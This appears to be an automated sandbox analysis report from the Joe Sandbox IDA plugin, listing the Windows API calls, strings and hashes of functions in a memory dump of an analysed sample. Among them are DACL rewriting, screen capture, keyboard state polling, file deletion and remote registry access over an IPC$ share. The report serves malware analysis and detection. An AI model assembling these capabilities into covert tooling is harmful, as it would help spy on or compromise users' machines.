Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 98b6c6350331a34436b9e2a9a4c3690c81d76c86618700d30cf822a43e4f6775
Instruction ID: 1e39ef658cfa69bacb43d675871278810c3b7fac8f8f01c34d7a84ef50120ffc
Opcode Fuzzy Hash: 98b6c6350331a34436b9e2a9a4c3690c81d76c86618700d30cf822a43e4f6775
Instruction Fuzzy Hash: 53816CB06083099FD721CF14CA85A7A7BE9FB88354F00492DFA95A3391C774E905CFA2

Function 007C8ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007C8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C8E3C
Part of subcall function 007C8E20: GetLastError.KERNEL32(?,007C8900,?,?,?), ref: 007C8E46
Part of subcall function 007C8E20: GetProcessHeap.KERNEL32(00000008,?,?,007C8900,?,?,?), ref: 007C8E55
Part of subcall function 007C8E20: HeapAlloc.KERNEL32(00000000,?,007C8900,?,?,?), ref: 007C8E5C
Part of subcall function 007C8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C8E73

Part of subcall function 007C8EBD: GetProcessHeap.KERNEL32(00000008,007C8916,00000000,00000000,?,007C8916,?), ref: 007C8EC9
Part of subcall function 007C8EBD: HeapAlloc.KERNEL32(00000000,?,007C8916,?), ref: 007C8ED0
Part of subcall function 007C8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007C8916,?), ref: 007C8EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007C8B2E
_memset.LIBCMT ref: 007C8B43
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007C8B62
GetLengthSid.ADVAPI32(?), ref: 007C8B73
GetAce.ADVAPI32(?,00000000,?), ref: 007C8BB0
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007C8BCC
GetLengthSid.ADVAPI32(?), ref: 007C8BE9
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007C8BF8
HeapAlloc.KERNEL32(00000000), ref: 007C8BFF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 007C8C20
CopySid.ADVAPI32(00000000), ref: 007C8C27
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007C8C58
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007C8C7E
SetUserObjectSecurity.USER32(?,00000004,?), ref: 007C8C92

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 234397cbf12c7809a9d9ad1e8578972956ed35b0c6e8b3e9fbf49048902a32f3
Instruction ID: f723a31925bc5fc7abb3c3e3e0d073393d2e705b3120551a48b4fccbcdcf3064
Opcode Fuzzy Hash: 234397cbf12c7809a9d9ad1e8578972956ed35b0c6e8b3e9fbf49048902a32f3
Instruction Fuzzy Hash: 3E613771A00209EFDF509FA4DC45FAEBB79FF04300F0481AEE915A6291EB399A05CB61

Function 007E7A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 007E7A79
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007E7A85
CreateCompatibleDC.GDI32(?), ref: 007E7A91
SelectObject.GDI32(00000000,?), ref: 007E7A9E
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007E7AF2
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 007E7B2E
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007E7B52
SelectObject.GDI32(00000006,?), ref: 007E7B5A
DeleteObject.GDI32(?), ref: 007E7B63
DeleteDC.GDI32(00000006), ref: 007E7B6A
ReleaseDC.USER32(00000000,?), ref: 007E7B75

Strings

(, xrefs: 007E7AFA

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 53f71a272c40676edacecf9ef73a426757efe699f13194862760e9aeea484c42
Instruction ID: 42062161530bf136b37acc7d2d978e49a320bf604dadcbdf96a138efe7568dd6
Opcode Fuzzy Hash: 53f71a272c40676edacecf9ef73a426757efe699f13194862760e9aeea484c42
Instruction Fuzzy Hash: DB513771904649EFCB24CFA9CC85FAEBBB9FF48310F14842DE95AA7210D635A940CB60

Function 007DA48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007DA4D4

Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77

LoadStringW.USER32(?,?,00000FFF,?), ref: 007DA4F6
__swprintf.LIBCMT ref: 007DA54F
__swprintf.LIBCMT ref: 007DA568
_wprintf.LIBCMT ref: 007DA61E
_wprintf.LIBCMT ref: 007DA63C

Strings

"%s" (%d) : ==> %s:, xrefs: 007DA637
Error: , xrefs: 007DA5E6
^ ERROR, xrefs: 007DA5C0
"%s" (%d) : ==> %s:%s%s, xrefs: 007DA619
Line %d (File "%s"):, xrefs: 007DA549, 007DA562

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 193de307fc56027e5d0d0f38c9629974c0b9f69647c8a2d7790f4e93290812ee
Instruction ID: 238d89e686884dbe5f7623b202c3c9c64949fb6d82d6af2372ad7a300017252c
Opcode Fuzzy Hash: 193de307fc56027e5d0d0f38c9629974c0b9f69647c8a2d7790f4e93290812ee
Instruction Fuzzy Hash: 44519B71840219FACF14FBA0DD4AEEEB779BF04340F500166F505A22A2EB396F59CB61

Function 007D9710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON

Download Yara Rule

APIs

Part of subcall function 007D951A: __time64.LIBCMT ref: 007D9524

Part of subcall function 00784A8C: _fseek.LIBCMT ref: 00784AA4

__wsplitpath.LIBCMT ref: 007D97EF

Part of subcall function 0079431E: __wsplitpath_helper.LIBCMT ref: 0079435E

_wcscpy.LIBCMT ref: 007D9802
_wcscat.LIBCMT ref: 007D9815
__wsplitpath.LIBCMT ref: 007D983A
_wcscat.LIBCMT ref: 007D9850
_wcscat.LIBCMT ref: 007D9863

Part of subcall function 007D9560: _memmove.LIBCMT ref: 007D9599
Part of subcall function 007D9560: _memmove.LIBCMT ref: 007D95A8

_wcscmp.LIBCMT ref: 007D97AA

Part of subcall function 007D9CF1: _wcscmp.LIBCMT ref: 007D9DE1
Part of subcall function 007D9CF1: _wcscmp.LIBCMT ref: 007D9DF4

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007D9A0D
_wcsncpy.LIBCMT ref: 007D9A80
DeleteFileW.KERNEL32(?,?), ref: 007D9AB6
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007D9ACC
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007D9ADD
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007D9AEF

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: b85c2bef07a085968b54a723a245bebf3eee8d9c95646a29f121a556f18c9891
Instruction ID: 78306b6728a083c2d271600e92d9d57958030c157306b351603090abb624f420
Opcode Fuzzy Hash: b85c2bef07a085968b54a723a245bebf3eee8d9c95646a29f121a556f18c9891
Instruction Fuzzy Hash: 2EC13CB1900219AADF15DFA5CC89EDEB7BDEF44300F0040ABF609E6251EB749A848F65

Function 00785BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00785BF1
GetMenuItemCount.USER32(00837890), ref: 007C0E7B
GetMenuItemCount.USER32(00837890), ref: 007C0F2B
GetCursorPos.USER32(?), ref: 007C0F6F
SetForegroundWindow.USER32(00000000), ref: 007C0F78
TrackPopupMenuEx.USER32(00837890,00000000,?,00000000,00000000,00000000), ref: 007C0F8B
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007C0F97

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: a73351433eab698bb40ce2e311656c30955ed40de6cea7baa2c65962a5c3e88e
Instruction ID: 56ed2ec339b2bf5c5423f0e6caa5f2a319abc62125fa231d4428731edf65963b
Opcode Fuzzy Hash: a73351433eab698bb40ce2e311656c30955ed40de6cea7baa2c65962a5c3e88e
Instruction Fuzzy Hash: 7C71C070684619FEEB20AB54DC89FAABF64FF04764F10021AF524A61D1C7B96860DFE0

Function 007C83FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B

_memset.LIBCMT ref: 007C8489
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007C84BE
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007C84DA
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007C84F6
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007C8520
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 007C8548
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007C8553
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007C8558

Strings

\IPC$, xrefs: 007C84A0
SOFTWARE\Classes\, xrefs: 007C842A
\CLSID, xrefs: 007C8440

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 1cc3a2f7f5b3a9aa1e0b3d4a314c68965b63ca58c032f3e14b10a0981fb85658
Instruction ID: e2434bca671cb4799cd6d762fc763099d4652b140936a7a6cda077dc99bd8071
Opcode Fuzzy Hash: 1cc3a2f7f5b3a9aa1e0b3d4a314c68965b63ca58c032f3e14b10a0981fb85658
Instruction Fuzzy Hash: 3E410872C5022DEBCF15EBA4EC99EEDB778FF04350F404169E815A2261EB385E05CB90

Function 007F147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491

Strings

HKEY_LOCAL_MACHINE, xrefs: 007F14FA
HKEY_CLASSES_ROOT, xrefs: 007F1524
HKLM, xrefs: 007F150F
HKCR, xrefs: 007F1539
HKCC, xrefs: 007F155F
HKEY_CURRENT_CONFIG, xrefs: 007F154E
HKEY_USERS, xrefs: 007F1592
HKCU, xrefs: 007F1581
HKU, xrefs: 007F15A3
HKEY_CURRENT_USER, xrefs: 007F1570

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 5cd73889340b5fb4cde9c877915ea369c93ef823c12a26150ee9abecf4892f88
Instruction ID: 979b01e3bbd853ef8f58cb239cc7fede9774296427fadf3a3ae9b0249ad4a577
Opcode Fuzzy Hash: 5cd73889340b5fb4cde9c877915ea369c93ef823c12a26150ee9abecf4892f88
Instruction Fuzzy Hash: FA41F97065026ECBDF04EFA0E855AFA3724FF51300FA04455EE5297252DB38AD69CBA1

Function 007D5882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B

Part of subcall function 0078153B: _memmove.LIBCMT ref: 007815C4

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007D58EB
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007D5901
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007D5912
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007D5924
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007D5935

Strings

play PlayMe, xrefs: 007D5930
status PlayMe mode, xrefs: 007D58E6
open , xrefs: 007D589A
alias PlayMe, xrefs: 007D58C4
play PlayMe wait, xrefs: 007D591F
close PlayMe, xrefs: 007D58FC, 007D5929

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: b2fb4a14913c8d05e820c16f6d5d7a36d89d8baf768ef3bb87c1118271cc6555
Instruction ID: 199096a11fbfa0c8046d5fce243e909092b75bc7d0437cde58ce0d51898af253
Opcode Fuzzy Hash: b2fb4a14913c8d05e820c16f6d5d7a36d89d8baf768ef3bb87c1118271cc6555
Instruction Fuzzy Hash: 41119331591169F9D720F7A1DC5EDBF6BBCFB91B50F80042AB411E22D0DE682945C6A0

Function 007D4C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 007D4C27
gethostname.WSOCK32(?,00000100), ref: 007D4C41
gethostbyname.WSOCK32(?), ref: 007D4C4E
_wcscpy.LIBCMT ref: 007D4C76
_memmove.LIBCMT ref: 007D4C89
inet_ntoa.WSOCK32(?), ref: 007D4C94
_strcat.LIBCMT ref: 007D4CA2
_wcscpy.LIBCMT ref: 007D4CB9
WSACleanup.WSOCK32 ref: 007D4CC7
_wcscpy.LIBCMT ref: 007D4CD5

Strings

0.0.0.0, xrefs: 007D4C70

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: c57c0c202db1ea10d5f5125d450809d1af7c3a1b24052bf5b8f3009ba7875036
Instruction ID: d037bdbe5b2916617e26b738a6da49efab2da7622937cb65ef62a6583586543b
Opcode Fuzzy Hash: c57c0c202db1ea10d5f5125d450809d1af7c3a1b24052bf5b8f3009ba7875036
Instruction Fuzzy Hash: 2E11D231515118BFCB61B764EC4AEEA77BCEF41710F0441A6F04896292EF7999828AA1

Function 007D5530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 007D5535

Part of subcall function 00790859: timeGetTime.WINMM(?,00000002,0077C22C), ref: 0079085D

Sleep.KERNEL32(0000000A), ref: 007D5561
EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 007D5585
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 007D55A7
SetActiveWindow.USER32 ref: 007D55C6
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007D55D4
SendMessageW.USER32(00000010,00000000,00000000), ref: 007D55F3
Sleep.KERNEL32(000000FA), ref: 007D55FE
IsWindow.USER32 ref: 007D560A
EndDialog.USER32(00000000), ref: 007D561B

Strings

BUTTON, xrefs: 007D5599

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 656363e80c9fcda770d2b60a740c882779ab9b3f76ccb386f67d2527165fafd6
Instruction ID: 2ce5814281eafd52e59170c3463d2edc06c8cd6f1e5223cfab0801c907ca0f43
Opcode Fuzzy Hash: 656363e80c9fcda770d2b60a740c882779ab9b3f76ccb386f67d2527165fafd6
Instruction Fuzzy Hash: 512196B0204704EFEB915B60FC89B263B7BFB95746F441816F50282361DF799E509F62

Function 007DDBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC

CoInitialize.OLE32(00000000), ref: 007DDC2D
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007DDCC0
SHGetDesktopFolder.SHELL32(?), ref: 007DDCD4
CoCreateInstance.OLE32(00803D4C,00000000,00000001,0082B86C,?), ref: 007DDD20
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007DDD8F
CoTaskMemFree.OLE32(?,?), ref: 007DDDE7
_memset.LIBCMT ref: 007DDE24
SHBrowseForFolderW.SHELL32(?), ref: 007DDE60
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007DDE83
CoTaskMemFree.OLE32(00000000), ref: 007DDE8A
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 007DDEC1
CoUninitialize.OLE32(00000001,00000000), ref: 007DDEC3

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 6fa4f56b947508227cad00b8221e2688352a6aa9cda7a8a2f6a41620de148e18
Instruction ID: 49cd3762ea4149259616fccc2272225ff25d36bee8794018c8fc608ffbf565f4
Opcode Fuzzy Hash: 6fa4f56b947508227cad00b8221e2688352a6aa9cda7a8a2f6a41620de148e18
Instruction Fuzzy Hash: C7B1C775A00109EFDB14DFA4C888EAEBBB9FF48314F148469E909EB351DB34AD45CB54

Function 007D081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 007D0896
SetKeyboardState.USER32(?), ref: 007D0901
GetAsyncKeyState.USER32(000000A0), ref: 007D0921
GetKeyState.USER32(000000A0), ref: 007D0938
GetAsyncKeyState.USER32(000000A1), ref: 007D0967
GetKeyState.USER32(000000A1), ref: 007D0978
GetAsyncKeyState.USER32(00000011), ref: 007D09A4
GetKeyState.USER32(00000011), ref: 007D09B2
GetAsyncKeyState.USER32(00000012), ref: 007D09DB
GetKeyState.USER32(00000012), ref: 007D09E9
GetAsyncKeyState.USER32(0000005B), ref: 007D0A12
GetKeyState.USER32(0000005B), ref: 007D0A20

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 0e32e645fbb90001c8f416b8b5b6aa2d285df91c2def130f6cee441d63c5e647
Instruction ID: e40590f2e9bd40b04ea3b35c56862b79f26d2e2ff8878de1697e4544c2fadf44
Opcode Fuzzy Hash: 0e32e645fbb90001c8f416b8b5b6aa2d285df91c2def130f6cee441d63c5e647
Instruction Fuzzy Hash: 4051CB3090478469FB35D7B048147AABFB49F01380F48959FD5C6577C3DA68AA8CCBE1

Function 007CCE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 007CCE1C
GetWindowRect.USER32(00000000,?), ref: 007CCE2E
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 007CCE8C
GetDlgItem.USER32(?,00000002), ref: 007CCE97
GetWindowRect.USER32(00000000,?), ref: 007CCEA9
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 007CCEFD
GetDlgItem.USER32(?,000003E9), ref: 007CCF0B
GetWindowRect.USER32(00000000,?), ref: 007CCF1C
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 007CCF5F
GetDlgItem.USER32(?,000003EA), ref: 007CCF6D
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007CCF8A
InvalidateRect.USER32(?,00000000,00000001), ref: 007CCF97

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
